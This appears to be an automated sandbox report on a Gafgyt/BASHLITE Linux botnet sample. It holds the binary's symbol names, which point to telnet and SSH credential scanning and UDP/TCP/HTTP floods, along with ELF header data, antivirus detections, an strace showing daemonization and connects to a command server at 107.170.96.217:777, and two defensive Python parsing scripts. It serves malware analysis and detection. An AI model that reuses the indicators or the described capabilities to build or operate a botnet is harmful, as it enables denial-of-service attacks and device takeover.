__malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.3001, , sigaction.c, , __restore_rt, , __restore, , libc/sysdeps/linux/i386/vfork.S, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , ioctl.c, , munmap.c, , nanosleep.c, , sbrk.c, , sigprocmask.c, , wait4.c, , __C_ctype_tolower.c, , errno.c, , __h_errno_location.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxtostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , memchr.c, , memmove.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , dnslookup.c, , mylock, , static_ns, , static_id, , opennameservers.c, , get_hosts_byname_r.c, , raise.c, , dl-support.c, , brk.c, , __syscall_error.c, , poll.c, , fclose.c, , fopen.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _fopen.c, , _cs_funcs.c, , fgets.c, , fflush_unlocked.c, , fgets_unlocked.c, , strcmp.c, , strncat.c, , rawmemchr.c, , strspn.c, , strdup.c, , ntop.c, , inet_pton4, , xdigits.3285, , inet_ntop4, , encodeh.c, , decodeh.c, , encodeq.c, , lengthq.c, , decodea.c, , read_etc_hosts_r.c, , llseek.c, , tolower.c, , fgetc_unlocked.c, , strcasecmp.c, , encoded.c, , decoded.c, , lengthd.c, , _READ.c, , _rfill.c, , _trans2r.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , UpdateNameSrvs, , __GI_execve, , __libc_sigaction, , strcpy, , __GI_fcntl64, , recvLine, , __socketcall, , __GI___ctype_b, , __GI_memchr, , 
BINS7, , __GI___glibc_strerror_r, , waitpid, , __open_nameservers, , __GI_fopen, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , BINS13, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , sysconf, , BIN, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , contains_fail, , __length_question, , __GI___ctype_toupper, , __GI_strcasecmp, , advance_telstate, , __GI_tolower, , BINS3, , recv, , connect, , __encode_question, , __GI___uClibc_fini, , numpids, , __encode_header, , __GI_strncat, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , __uClibc_fini, , memrchr, , geteuid, , inet_pton, , __GI_vsnprintf, , memmove, , __bsd_signal, , __GI_strpbrk, , __stdio_trans2r_o, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_wcsnrtombs, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , getc_unlocked, , __ctype_b, , __GI_random_r, , errno, , getegid, , read_until_response, , __GI_sbrk, , SSH_Usernames, , zprintf, , __GI___uClibc_init, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , fgets, , getHost, , __libc_getpid, , BINS2, , wildString, , __xpg_strerror_r, , SendUDP, , fcntl64, , prctl, , memcpy, , TelnetScanner, , makeRandomStr, , getRandomIP, , __GI_fputs_unlocked, , execl, , __GI_fgets, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , FTP1, , __pthread_mutex_init, , tolower, , getuid, , system, , __open_etc_hosts, , malloc, , isatty, , sleep, , __GI_atol, , vsnprintf, , __dns_lookup, , __GI_read, , __C_ctype_tolower, , random_r, , __dso_handle, , clock_getres, , gethostbyname_r, , tcpcsum, , reset_telstate, , BINS5, , socket, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , 
__GI_strcoll, , __GI_write, , __ctype_toupper, , __libc_read, , _string_syserrmsgs, , BINS11, , __GI_open, , __GI_strchr, , __searchdomain, , __GI_tcgetattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , __fgetc_unlocked, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , SendSTD, , BINS10, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , RandomPythonRange, , strtol, , __libc_lseek64, , strnlen, , rawmemchr, , TFTP2, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , Payload, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , Mirai_Usernames, , RemoveTempDirs, , __GI_execl, , __GI_srandom_r, , __GI___ctype_tolower, , write, , environ, , __GI_close, , getBuild, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , Bot_Killer_Binarys, , BINS6, , __GI_brk, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , TFTP1, , ntohl, , __GI_fseek, , __GI_setreuid, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , __GI_strcmp, , __GI_memmove, , setstate, , __decode_dotted, , __stdio_READ, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , strcasestr, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , BINS1, , signal, , read, , __decode_header, , __GI___h_errno_location, , __GI_memcpy, , strcoll, , wcsrtombs, , _stdio_user_locking, , BINS8, , strncpy, , strcasecmp, , htonl, , sendto, , Python_Temp_Directory, , __C_ctype_toupper, , __GI___C_ctype_b, , Telnet_Passwords, , __GI_gethostbyname_r, , __GI_strncpy, , MiraiIPRanges, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , __GI___C_ctype_tolower, , Mirai_Passwords, , 
__GI_getrlimit, , bcopy, , __GI_strcpy, , __GI_inet_ntop, , strtok, , getEndianness, , ClearHistory, , __stdio_adjust_position, , malloc_trim, , __GI_poll, , _vfprintf_internal, , __GI_strcasestr, , Busybox_Payload, , fork, , Python_File_Location, , __stdio_rfill, , strncat, , setresuid, , __GI_sleep, , sigaction, , __GI_gethostbyname, , SendTCP, , _dl_phdr, , __GI_getc_unlocked, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , _store_inttype, , __length_dotted, , __getpagesize, , __GI_random, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , strdup, , __libc_close, , __GI_getpid, , inet_aton, , _pthread_cleanup_push_defer, , index, , processCmd, , __sigismember, , fopen, , __bss_start, , setreuid, , __libc_open, , get_telstate_host, , memset, , __GI_socket, , main, , MiraiScanner, , __glibc_strerror_r, , listFork, , __GI___C_ctype_tolower_data, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , inet_ntoa, , getppid, , tcgetattr, , __C_ctype_tolower_data, , time, , __libc_system, , __GI_abort, , poll, , seteuid, , __get_hosts_byname_r, , __stdio_init_mutex, , __GI__exit, , strcmp, , advances2, , __nameserver, , data_start, , __GI_sysconf, , __h_errno_location, , Telnet_Usernames, , matchPrompt, , SSH_Passwords, , __C_ctype_b_data, , __GI_inet_pton, , gethostbyname, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , contains_success, , sprintf, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , socket_connect, , __GI_waitpid, , _stdio_term, , __decode_answer, , __GI_signal, , stderr, , fails, , commServer, , vfork, , __C_ctype_b, , srandom, , _ppfs_setargs, , __GI_sendto, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , __GI_setresuid, , advances, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wcommit, , contains_string, , __GI___fgetc_unlocked, , 
__nameservers, , fwrite_unlocked, , BINS_HOST_IP, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , contains_response, , access, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , __searchdomains, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , __GI_connect, , __curbrk, , __libc_poll, , _dl_phnum, , _fpmaxtostr, , __errno_location, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , inet_ntop, , brk, , __C_ctype_toupper_data, , _dl_aux_init, , _errno, , atoi, , successes, , BINS9, , _stdio_openlist_del_lock, , __GI_inet_aton, , fgets_unlocked, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , PythonRanges, , open, , Temp_Directorys, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , BINS4, , BINS12, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_start, , __GI_inet_addr, , __GI_seteuid, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __GI___errno_location, , fcntl, , setuid, , read_with_timeout, , __GI_atoi, , fseeko64, , __GI_sprintf, , __ctype_tolower, , wcrtomb, , close, , __libc_connect, , __GI_strlen, , mainCommSock, , pids, , SendHTTP, , strpbrk, , _load_inttype, , raise, , useragents, , free, , sigprocmask,
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x8048168
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
78984
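The entry point and the program/section header counts listed above are read straight out of the 52-byte ELF32 header. The Python below is an added example for this report, not code from the sandbox or from the sample: it decodes those fields with only the standard library and then runs the consistency checks a triage script should make before trusting them. A header table that runs past end-of-file means a truncated download or deliberately bogus offsets, and a missing section header table is typical of stripped or packed IoT bots (this sample has 16 sections and no packer). The sample bytes are constructed from the values the report prints; the value of e_shstrndx (15) and the file size used for the bounds check (100884 bytes, the report's 98.52KB) are assumptions.

```python
"""Decode an ELF32 header into the fields a sandbox report prints and run
cheap sanity checks on them. Added example; sample bytes are constructed."""
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFDATA2LSB = 1, 1
ELF32_EHSIZE, ELF32_PHENTSIZE, ELF32_SHENTSIZE = 52, 32, 40

E_TYPE = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
E_MACHINE = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64"}
OSABI = {0: "ELFOSABI_SYSV", 3: "ELFOSABI_LINUX"}


def parse_elf32_header(data: bytes) -> dict:
    """Unpack e_ident plus the 36 bytes of fixed fields that follow it."""
    if len(data) < ELF32_EHSIZE or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != ELFCLASS32:
        raise ValueError("only ELF32 is handled here")
    endian = "<" if data[5] == ELFDATA2LSB else ">"
    (e_type, e_machine, _ver, e_entry, e_phoff, e_shoff, _flags, e_ehsize,
     e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx) = \
        struct.unpack(endian + "HHIIIIIHHHHHH", data[16:52])
    return {
        "abi": OSABI.get(data[7], f"osabi_{data[7]}"),
        "type": E_TYPE.get(e_type, f"type_{e_type}"),
        "machine": E_MACHINE.get(e_machine, f"machine_{e_machine}"),
        "wordsize": 32,
        "entry": e_entry,
        "ehsize": e_ehsize,
        "phdr": {"size": e_phentsize, "number": e_phnum, "offset": e_phoff},
        "shdr": {"size": e_shentsize, "number": e_shnum, "offset": e_shoff,
                 "strndx": e_shstrndx},
    }


def sanity_warnings(hdr: dict, file_size: int) -> list:
    """Flag odd entry sizes, tables past EOF (truncated or bogus offsets) and
    a missing section header table (stripped/packed binaries)."""
    w = []
    if hdr["ehsize"] != ELF32_EHSIZE:
        w.append(f"e_ehsize {hdr['ehsize']} != {ELF32_EHSIZE}")
    ph, sh = hdr["phdr"], hdr["shdr"]
    if ph["size"] != ELF32_PHENTSIZE:
        w.append(f"e_phentsize {ph['size']} != {ELF32_PHENTSIZE}")
    if ph["number"] == 0:
        w.append("no program headers: nothing to load")
    elif ph["offset"] + ph["number"] * ph["size"] > file_size:
        w.append("program header table runs past end of file")
    if sh["number"] == 0 or sh["offset"] == 0:
        w.append("no section header table (stripped or packed?)")
    elif sh["size"] != ELF32_SHENTSIZE:
        w.append(f"e_shentsize {sh['size']} != {ELF32_SHENTSIZE}")
    elif sh["offset"] + sh["number"] * sh["size"] > file_size:
        w.append("section header table runs past end of file")
    elif sh["strndx"] >= sh["number"]:
        w.append("e_shstrndx points outside the section header table")
    return w


def build_sample_header() -> bytes:
    """Constructed header carrying this report's values: ET_EXEC, x86, entry
    0x8048168, 3 phdrs at offset 52, 16 shdrs at 78984. e_shstrndx=15 is an
    assumption; the report does not print it."""
    ident = ELF_MAGIC + bytes([ELFCLASS32, ELFDATA2LSB, 1, 0]) + b"\0" * 8
    return ident + struct.pack(
        "<HHIIIIIHHHHHH",
        2, 3, 1, 0x8048168, 52, 78984, 0,
        ELF32_EHSIZE, ELF32_PHENTSIZE, 3, ELF32_SHENTSIZE, 16, 15)


if __name__ == "__main__":
    hdr = parse_elf32_header(build_sample_header())
    print(hdr)
    # 98.52KB in the report, taken here as 100884 bytes (assumption)
    print(sanity_warnings(hdr, 100884) or "header consistent")
```

Run it against a real file with `parse_elf32_header(open(path, "rb").read()[:52])` and `sanity_warnings(hdr, os.path.getsize(path))`; the same warnings list is what you would attach to a report before an analyst reads the symbol table.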
AVclass
gafgyt
1
VirusTotal
md5
74b4c9ff209fe609737c69b326ee7d46
sha1
da0acff001489d9b5a5cf1e6c63bd63ee922dd09
SCANS (DETECTION RATE = 44.07%, 26 of 59 engines)
Engine | Result | Update | Version | Detected
AVG | ELF:DDoS-Y [Trj] | 20180828 | 18.4.3895.0 | True
CMC | - | 20180828 | 1.1.0.977 | False
MAX | - | 20180828 | 2017.11.15.1 | False
Bkav | - | 20180828 | 1.3.0.8876 | False
K7GW | - | 20180828 | 10.60.28202 | False
ALYac | - | 20180828 | 1.1.1.5 | False
Avast | ELF:DDoS-Y [Trj] | 20180828 | 18.4.3895.0 | True
Avira | DDOS/LNX.Lightaidra.ynghy | 20180828 | 8.3.3.6 | True
Baidu | - | 20180828 | 1.0.0.2 | False
Cyren | - | 20180828 | 6.0.0.4 | False
DrWeb | Linux.BackDoor.Fgt.707 | 20180828 | 7.0.33.6080 | True
GData | Linux.Trojan.Gafgyt.A | 20180828 | A:25.18279B:25.13076 | True
Panda | - | 20180828 | 4.6.4.2 | False
VBA32 | - | 20180828 | 3.33.0 | False
VIPRE | - | 20180828 | 69154 | False
Zoner | - | 20180827 | 1.0 | False
AVware | - | 20180823 | 1.6.0.52 | False
ClamAV | Unix.Malware.Agent-6318128-0 | 20180828 | 0.100.1.0 | True
Comodo | - | 20180828 | - | False
F-Prot | - | 20180828 | 4.7.1.166 | False
Ikarus | Trojan.Linux.Tsunami | 20180828 | 0.1.5.2 | True
McAfee | Linux/Gafgyt.h | 20180828 | 6.0.6.653 | True
Rising | Trojan.Linux/Gafgyt!1.AD1C (CLASSIC) | 20180828 | 25.0.0.24 | True
Sophos | Linux/DDoS-BI | 20180828 | 4.98.0 | True
Yandex | - | 20180827 | 5.5.1.3 | False
Zillya | - | 20180827 | 2.0.0.3625 | False
Arcabit | - | 20180828 | 1.0.0.833 | False
Babable | - | 20180822 | 9107201 | False
TACHYON | - | 20180828 | 2018-08-28.02 | False
Tencent | Backdoor.Linux.Gafgyt.aa | 20180828 | 1.0.0.1 | True
ViRobot | - | 20180828 | 2014.3.20.0 | False
Ad-Aware | - | 20180828 | 3.0.5.370 | False
AegisLab | Trojan.Linux.Generic.m!c | 20180828 | 4.2 | True
Emsisoft | - | 20180828 | 2018.4.0.1029 | False
F-Secure | - | 20180828 | 11.0.19100.45 | False
Fortinet | ELF/Gafgyt.LT!tr.bdr | 20180828 | 5.4.247.0 | True
Jiangmin | Backdoor.Linux.hhm | 20180828 | 16.0.100 | True
Kingsoft | - | 20180828 | 2013.8.14.323 | False
Symantec | Linux.Gafgyt | 20180828 | 1.7.0.0 | True
AhnLab-V3 | Linux/Mirai.Gen | 20180828 | 3.13.1.21616 | True
Antiy-AVL | Trojan[Backdoor]/Linux.Gafgyt.af | 20180828 | 3.0.0.1 | True
Kaspersky | HEUR:Backdoor.Linux.Gafgyt.af | 20180828 | 15.0.1.13 | True
Microsoft | DDoS:Linux/Lightaidra | 20180828 | 1.1.15200.1 | True
Qihoo-360 | Win32/Trojan.DDoS.1be | 20180828 | 1.0.0.1120 | True
TheHacker | - | 20180824 | 6.8.0.5.3581 | False
ZoneAlarm | HEUR:Backdoor.Linux.Gafgyt.af | 20180828 | 1.0 | True
ESET-NOD32 | a variant of Linux/Gafgyt.UN | 20180828 | 17956 | True
TrendMicro | Possible_BASHLITE.SMLBE1 | 20180828 | 10.0.0.1040 | True
BitDefender | - | 20180828 | 7.2 | False
K7AntiVirus | - | 20180828 | 10.61.28206 | False
Avast-Mobile | ELF:DDoS-S [Trj] | 20180828 | 180827-06 | True
Malwarebytes | - | 20180828 | 2.1.1.1115 | False
TotalDefense | - | 20180828 | 37.1.62.1 | False
CAT-QuickHeal | - | 20180828 | 14.00 | False
NANO-Antivirus | - | 20180828 | 1.0.116.23366 | False
MicroWorld-eScan | - | 20180828 | 14.0.297.0 | False
SUPERAntiSpyware | - | 20180828 | 5.6.0.1032 | False
McAfee-GW-Edition | Linux/Gafgyt.h | 20180828 | v2017.3010 | True
TrendMicro-HouseCall | Possible_BASHLITE.SMLBE1 | 20180828 | 9.950.0.1006 | True

total
59
sha256
4e99b1006ed58305f2d0b222b3dd92032661fee310da503cd4adc0443dc31c76
scan_id
4e99b1006ed58305f2d0b222b3dd92032661fee310da503cd4adc0443dc31c76-1535463068
resource
74b4c9ff209fe609737c69b326ee7d46
positives
26
scan_date
2018-08-28 13:31:08
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291 execve("./malware", ["./malware"], [/* 15 vars */]) = 0
4291 ioctl(0, TCGETS, 0xffa28880) = -1 ENOTTY (Inappropriate ioctl for device)
4291 ioctl(1, TCGETS, 0xffa28880) = -1 ENOTTY (Inappropriate ioctl for device)
4291 prctl(PR_SET_NAME, "\0/\0[ CONNECTED ]") = 0
4291 time(NULL) = 1571351692
4291 getpid() = 4291
4291 time(NULL) = 1571351692
4291 getpid() = 4291
4291 fork() = 4292
4291 wait4(4292, <unfinished ...>
4292 fork() = 4293
4292 exit(0) = ?
4291 <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 4292
4291 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4292, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
4291 exit(0) = ?
4293 chdir("/") = 0
4293 setuid32(0) = -1 EPERM (Operation not permitted)
4293 setresuid32(-1, 0, -1) = -1 EPERM (Operation not permitted)
4293 rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x8052faf}, {SIG_DFL, [], 0}, 8) = 0
4293 fork() = 4294
4293 exit(0) = ?
4294 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4294 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
4294 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4294 connect(3, {sa_family=AF_INET, sin_port=htons(777), sin_addr=inet_addr("107.170.96.217")}, 16) = -1 EINPROGRESS (Operation now in progress)
4294 _newselect(4, NULL, [3], NULL, ...) = 0 (Timeout)
4294 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4294 rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
4294 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
4294 nanosleep({5, 1571351692}, 0xffa27814) = 0
4294 fork() = 4308
4294 exit(0) = ?
4308 close(3) = 0
4308 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4308 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
4308 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4308 connect(3, {sa_family=AF_INET, sin_port=htons(777), sin_addr=inet_addr("107.170.96.217")}, 16) = -1 EINPROGRESS (Operation now in progress)
4308 _newselect(4, NULL, [3], NULL, {30, 8} <unfinished ...>
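The trace above is the bot's whole startup sequence: a double fork with each parent exiting (classic daemonization), chdir("/"), failed attempts to become root via setuid32(0) and setresuid32(-1, 0, -1), SIGPIPE set to SIG_IGN so a dropped C2 socket cannot kill the process, a non-blocking connect() to 107.170.96.217:777 bounded by select(), then a 5-second nanosleep and another fork-and-retry in a fresh child. The Python below is an added example for this report, not the sandbox's own tooling: it pulls those markers and the C2 endpoint out of an strace -f log and records whether each non-blocking connect ever completed. The embedded trace is a constructed, cleaned-up subset of the report's strace; the PR_SET_NAME string and the select timeout value in it are simplified assumptions.

```python
"""Extract C2 endpoints and behaviour markers (fork/exit chain, privilege
changes, process renaming, ignored signals) from an strace -f log.
Added example; SAMPLE_TRACE is a constructed subset of the report's trace."""
import re
from collections import defaultdict

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<call>\w+)\((?P<args>.*)\)\s+=\s+"
                     r"(?P<ret>-?\d+|\?)(?P<rest>.*)$")
CONNECT_RE = re.compile(r'sin_port=htons\((\d+)\).*?inet_addr\("([\d.]+)"\)')
ERRNO_RE = re.compile(r"^\s*(E[A-Z0-9]+)")
PRIV_CALLS = {"setuid", "setuid32", "seteuid", "setreuid", "setreuid32",
              "setresuid", "setresuid32", "setgid", "setgid32"}
FORK_CALLS = {"fork", "vfork", "clone"}
EXIT_CALLS = {"exit", "_exit", "exit_group"}

# Constructed from the report's strace (timeouts and the PR_SET_NAME string
# simplified); pid 4308 is still inside select() when the sandbox times out.
SAMPLE_TRACE = """\
4291 execve("./malware", ["./malware"], [/* 15 vars */]) = 0
4291 prctl(PR_SET_NAME, "[ CONNECTED ]") = 0
4291 fork() = 4292
4292 fork() = 4293
4292 exit(0) = ?
4291 exit(0) = ?
4293 setuid32(0) = -1 EPERM (Operation not permitted)
4293 setresuid32(-1, 0, -1) = -1 EPERM (Operation not permitted)
4293 rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x8052faf}, {SIG_DFL, [], 0}, 8) = 0
4293 fork() = 4294
4293 exit(0) = ?
4294 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4294 connect(3, {sa_family=AF_INET, sin_port=htons(777), sin_addr=inet_addr("107.170.96.217")}, 16) = -1 EINPROGRESS (Operation now in progress)
4294 _newselect(4, NULL, [3], NULL, {30, 0}) = 0 (Timeout)
4294 fork() = 4308
4294 exit(0) = ?
4308 close(3) = 0
4308 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4308 connect(3, {sa_family=AF_INET, sin_port=htons(777), sin_addr=inet_addr("107.170.96.217")}, 16) = -1 EINPROGRESS (Operation now in progress)
"""


def parse_line(line: str):
    """Split 'PID call(args) = ret ERRNO (text)' into parts; None for signal
    delivery lines and unfinished/resumed fragments."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["pid"] = int(ev["pid"])
    ev["ret"] = None if ev["ret"] == "?" else int(ev["ret"])
    e = ERRNO_RE.match(ev["rest"])
    ev["errno"] = e.group(1) if e else None
    return ev


def analyse(trace: str) -> dict:
    children = defaultdict(list)   # parent pid -> child pids, in order
    exited, names, priv, connects, ignored = set(), {}, [], [], []
    pending = {}                   # (pid, fd) -> non-blocking connect awaiting select
    root = None
    for raw in trace.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        pid, call, args, ret = ev["pid"], ev["call"], ev["args"], ev["ret"]
        if call == "execve" and root is None:
            root = pid
        elif call in FORK_CALLS and ret is not None and ret > 0:
            children[pid].append(ret)
        elif call in EXIT_CALLS:
            exited.add(pid)
        elif call == "prctl" and args.startswith("PR_SET_NAME"):
            names[pid] = args.split(",", 1)[1].strip().strip('"')
        elif call in PRIV_CALLS:
            priv.append({"pid": pid, "call": f"{call}({args})",
                         "outcome": ev["errno"] or "ok"})
        elif call == "rt_sigaction" and \
                args.split(",", 1)[-1].strip().startswith("{SIG_IGN"):
            ignored.append(args.split(",")[0])
        elif call == "connect":
            m = CONNECT_RE.search(args)
            if m:
                rec = {"pid": pid, "dst": f"{m.group(2)}:{m.group(1)}",
                       "outcome": ev["errno"] or "connected"}
                connects.append(rec)
                if ev["errno"] == "EINPROGRESS":
                    pending[(pid, int(args.split(",")[0]))] = rec
        elif call in ("_newselect", "select", "poll") and ret == 0:
            # select()/poll() returned 0: the pending connect never completed
            for key in [k for k in pending if k[0] == pid]:
                pending.pop(key)["outcome"] = "EINPROGRESS, then select timeout"
    # Each process that forked and then exited hands off to its last child;
    # the first pid that never exited is the surviving worker.
    chain, pid = [], root
    while pid is not None and pid not in chain:
        chain.append(pid)
        pid = children[pid][-1] if pid in exited and children[pid] else None
    return {"fork_chain": chain, "survivor": chain[-1] if chain else None,
            "process_names": names, "privilege_calls": priv,
            "ignored_signals": ignored, "connects": connects,
            "c2_candidates": sorted({c["dst"] for c in connects})}


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_TRACE).items():
        print(f"{key}: {value}")
```

The fork chain and the `c2_candidates` list are the two values worth keeping from a run like this one: the chain tells you which pid to watch in the rest of the trace, and a connect that only ever reaches "EINPROGRESS, then select timeout" means the C2 was down or sinkholed during the run, so the sandbox never saw the command protocol that `processCmd` and the `SendTCP`/`SendHTTP` symbols implement.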

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True

DNS
Query

Response

TCP
Info
localhost:55132 -> 107.170.96.217:777
localhost:55130 -> 107.170.96.217:777
(These two flows match the two non-blocking connect() attempts in the strace; neither completed before the sandbox timeout.)

UDP
Info
localhost:5353 -> 224.0.0.251:5353
(mDNS multicast. The sample's strace opens only TCP sockets, so this is most likely background traffic from the sandbox host rather than bot activity.)

HTTP
Info

Summary
DNS
False

TCP
True

UDP
True

HTTP
False

Binary
RF
confidence: 100.00%
suspicious: True
MLP
confidence: 99.98%
suspicious: True
SVM
confidence: 98.80%
suspicious: True